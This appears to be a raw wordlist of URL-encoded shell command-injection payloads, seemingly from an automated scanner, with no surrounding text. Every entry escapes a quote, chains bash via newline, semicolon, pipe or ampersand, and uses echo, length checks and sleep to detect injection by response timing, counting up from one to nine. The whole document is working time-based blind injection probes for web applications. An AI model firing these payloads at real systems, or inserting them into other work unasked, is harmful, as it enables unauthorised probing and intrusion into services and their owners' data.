+%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%27%7C%20%5B%201%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%202%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%203%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%204%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%205%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%206%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%207%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%208%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%7C%20%5B%209%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%27%7C%20%5B%201%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%202%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%203%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%204%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%205%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%206%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%207%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%208%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%7C%20%5B%209%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%22%7C%20%5B%201%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%202%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%203%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%204%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%205%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%206%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%207%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%208%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%7C%20%5B%209%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%22%7C%20%5B%201%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%202%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%203%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%204%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%205%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%206%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%207%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%7C%20%5B%208%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 